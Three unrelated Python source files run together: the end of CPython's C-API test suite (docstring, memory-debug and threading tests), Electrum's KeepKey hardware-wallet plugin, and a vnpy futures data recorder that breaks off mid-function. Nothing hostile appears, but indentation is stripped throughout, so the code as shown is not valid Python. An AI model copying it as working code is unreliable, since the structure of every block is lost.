"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned NULL '
br'without setting an error\n'
br'SystemError: <built-in function '
br'return_null_without_error> returned NULL '
br'without setting an error\n'
br'\n'
br'Current thread.*:\n'
br' File .*", line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an error')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned a '
br'result with an error set\n'
br'ValueError\n'
br'\n'
br'The above exception was the direct cause '
br'of the following exception:\n'
br'\n'
br'SystemError: <built-in '
br'function return_result_with_error> '
br'returned a result with an error set\n'
br'\n'
br'Current thread.*:\n'
br' File .*, line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an error set')
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
self.assertIn(b'MemoryError 1 10', out)
self.assertIn(b'MemoryError 2 20', out)
self.assertIn(b'MemoryError 3 30', out)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
@unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
'need _testcapi.negative_refcount')
def test_negative_refcount(self):
# bpo-35059: Check that Py_DECREF() reports the correct filename
# when calling _Py_NegativeRefcount() to abort Python.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.negative_refcount()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err,
br'_testcapimodule\.c:[0-9]+: '
br'_Py_NegativeRefcount: Assertion failed: '
br'object has negative ref count')
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure('-c', code,
PYTHONMALLOC=self.PYTHONMALLOC)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfd\n"
r" at tail\+2: 0xfd\n"
r" .*\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: Python memory allocator called '
'without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
def check_pyobject_is_freed(self, func):
code = textwrap.dedent('''
import gc, os, sys, _testcapi
# Disable the GC to avoid crash on GC collection
gc.disable()
obj = _testcapi.{func}()
error = (_testcapi.pyobject_is_freed(obj) == False)
# Exit immediately to avoid a crash while deallocating
# the invalid object
os._exit(int(error))
''')
code = code.format(func=func)
assert_python_ok('-c', code, PYTHONMALLOC=self.PYTHONMALLOC)
def test_pyobject_is_freed_uninitialized(self):
self.check_pyobject_is_freed('pyobject_uninitialized')
def test_pyobject_is_freed_forbidden_bytes(self):
self.check_pyobject_is_freed('pyobject_forbidden_bytes')
def test_pyobject_is_freed_free(self):
self.check_pyobject_is_freed('pyobject_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
if __name__ == "__main__":
unittest.main()
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import deserialize_xpub
from electrum import constants
from electrum.i18n import _
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = keepkeylib.transport_hid.DEVICE_IDS
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def create_client(self, device, handler):
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
whole_markket_recorder.py
|
"""
全市场行情录制
参考:https://www.vnpy.com/forum/topic/3046-quan-shi-chang-lu-zhi-xing-qing-shu-ju
"""
import sys
import multiprocessing
import re
from contextlib import closing
from copy import copy
from copy import deepcopy
from vnpy.trader.constant import Exchange, Interval
from vnpy.trader.object import BarData, HistoryRequest, Product, TickData
from vnpy.trader.database import init
from vnpy.trader.setting import get_settings
from enum import Enum
from time import sleep
from datetime import datetime, time, timedelta
from logging import INFO
from vnpy.event import EventEngine
from vnpy.trader.setting import SETTINGS
from vnpy.trader.engine import MainEngine
from vnpy.trader.utility import load_json, extract_vt_symbol
from vnpy.gateway.ctp import CtpGateway
from vnpy.app.cta_strategy import CtaStrategyApp
from vnpy.app.cta_strategy.base import EVENT_CTA_LOG
from vnpy.trader.event import EVENT_CONTRACT, EVENT_TICK
from vnpy.app.data_recorder.engine import RecorderEngine
EXCHANGE_LIST = [
Exchange.SHFE,
Exchange.DCE,
Exchange.CZCE,
Exchange.CFFEX,
Exchange.INE,
]
SETTINGS["log.active"] = True
SETTINGS["log.level"] = INFO
SETTINGS["log.console"] = True
CTP_SETTING = load_json("connect_ctp.json")
def is_futures(vt_symbol: str) -> bool:
"""
是否是期货
"""
return bool(re.match(r"^[a-zA-Z]{1,3}\d{2,4}.[A-Z]+$", vt_symbol))
class RecordMode(Enum):
BAR = "bar"
TICK = "tick"
class WholeMarketRecorder(RecorderEngine):
def __init__(self, main_engine, event_engine, record_modes=[RecordMode.BAR]):
super().__init__(main_engine, event_engine)
self.record_modes = record_modes
# 非交易时间
self.drop_start = time(3, 15)
self.drop_end = time(8, 45)
# 大连、上海、郑州交易所,小节休息
self.rest_start = time(10, 15)
self.rest_end = time(10, 30)
def is_trading(self, vt_symbol, current_time) -> bool:
"""
交易时间,过滤校验Tick
"""
symbol, exchange = extract_vt_symbol(vt_symbol)
if self.drop_start <= current_time < self.drop_end:
return False
if exchange in [Exchange.DCE, Exchange.SHFE, Exchange.CZCE]:
if self.rest_start <= current_time < self.rest_end:
return False
return True
def load_setting(self):
pass
def record_tick(self, tick: TickData):
"""
抛弃非交易时间校验数据
"""
tick_time = tick.datetime.time()
if not self.is_trading(tick.vt_symbol, tick_time):
return
task = ("tick", copy(tick))
self.queue.put(task)
def record_bar(self, bar: BarData):
"""
抛弃非交易时间校验数据
"""
bar_time = bar.datetime.time()
if not self.is_trading(bar.vt_symbol, bar_time):
return
task = ("bar", copy(bar))
self.queue.put(task)
def process_contract_event(self, event):
""""""
contract = event.data
vt_symbol = contract.vt_symbol
# 不录制期权
if is_futures(vt_symbol):
if RecordMode.BAR in self.record_modes:
self.add_bar_recording(vt_symbol)
if RecordMode.TICK in self.record_modes:
self.add_tick_recording(vt_symbol)
self.subscribe(contract)
def run_child():
"""
Running in the child process.
"""
SETTINGS["log.file"] = True
event_engine = EventEngine()
main_engine = MainEngine(event_engine)
main_engine.add_gateway(CtpGateway)
main_engine.write_log("主引擎创建成功")
# 记录引擎
log_engine = main_engine.get_engine("log")
event_engine.register(EVENT_CTA_LOG, log_engine.process_log_event)
main_engine.write_log("注册日志事件监听")
main_engine.connect(CTP_SETTING, "CTP")
main_engine.write_log("连接CTP接口")
whole_market_recorder = WholeMarketRecorder(main_engine, event_engine)
main_engine.write_log("开始录制数据")
oms_engine = main_engine.get_engine("oms")
while True:
sleep(1)
def run_parent():
"""
Running in the parent process.
"""
print("启动CTA策略守护父进程")
# Chinese futures market trading period (day/night)
MORNING_START = time(8, 45)
MORNING_END = time(12, 0)
AFTERNOON_START = time(12, 45)
AFTERNOON_END = time(15, 35)
NIGHT_START = time(20, 45)
NIGHT_END = time(3, 5)
child_process = None
while True:
current_time = datetime.now().time()
trading = False
# Check whether in trading period
if (
(current_time >= MORNING_START and current_time <= MORNING_END)
or (current_time >= AFTERNOON_START and current_time <= AFTERNOON_END)
